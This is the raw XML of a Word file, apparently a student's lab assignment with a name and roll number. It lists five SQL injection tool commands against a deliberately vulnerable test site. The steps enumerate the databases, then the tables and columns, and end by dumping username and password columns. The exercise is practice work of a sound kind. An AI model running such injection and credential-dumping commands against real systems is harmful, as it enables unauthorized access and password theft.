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164C" w14:textId="64A767A9" w:rsidR="001767CA" w:rsidRDefault="001767CA"/>
    <w:p w14:paraId="0540B828" w14:textId="1EE59061" w:rsidR="003435FD" w:rsidRPr="003435FD" w:rsidRDefault="003435FD" w:rsidP="003435FD"/>
    <w:p w14:paraId="67E09567" w14:textId="2DD08B27" w:rsidR="003435FD" w:rsidRPr="003435FD" w:rsidRDefault="003435FD" w:rsidP="003435FD"/>
    <w:p w14:paraId="34771EE0" w14:textId="58E84AB2" w:rsidR="003435FD" w:rsidRPr="003435FD" w:rsidRDefault="003435FD" w:rsidP="003435FD"/>
    <w:p w14:paraId="628667E7" w14:textId="594CEF92" w:rsidR="003435FD" w:rsidRDefault="003435FD" w:rsidP="003435FD"/>
    <w:p w14:paraId="58628C7F" w14:textId="77777777" w:rsidR="003435FD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Name: Haziq Ahmed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Roll no: 231452941</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4CC10" w14:textId="77777777" w:rsidR="003435FD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E819AB3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Step 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18CFF2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testasp.vulnweb.com/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showforum.asp?id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=1 --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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BEE47C3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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F43DD4F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ttestasp.vulnweb.com/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showforum.asp?id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acuforum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--tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398DCE88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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038FF0A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testasp.vulnweb.com/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showforum.asp?id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=1-D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acuforum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--columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CEEFB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Step 4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208916E9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testasp.vulnweb.com/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showforum.asp?id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acuforum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-C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uname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--dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4640A8B5" w14:textId="77777777" w:rsidR="000D0C87" w:rsidRPr="000D0C87" w:rsidRDefault="000D0C87" w:rsidP="000D0C8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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F8808" w14:textId="39950D35" w:rsidR="003435FD" w:rsidRPr="003435FD" w:rsidRDefault="000D0C87" w:rsidP="000D0C87"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testasp.vulnweb.com/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showforum.asp?id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acuforum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-C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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upass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D0C8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--dump --threads 6</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003435FD" w:rsidRPr="0034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E"/>
    <w:rsid w:val="000924EE"/>
    <w:rsid w:val="000D0C87"/>
    <w:rsid w:val="001767CA"/>
    <w:rsid w:val="0034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C32A7-1BDE-439C-B474-4F5984D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F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ahmed</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>haziq ahmed</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-28T07:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-28T11:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>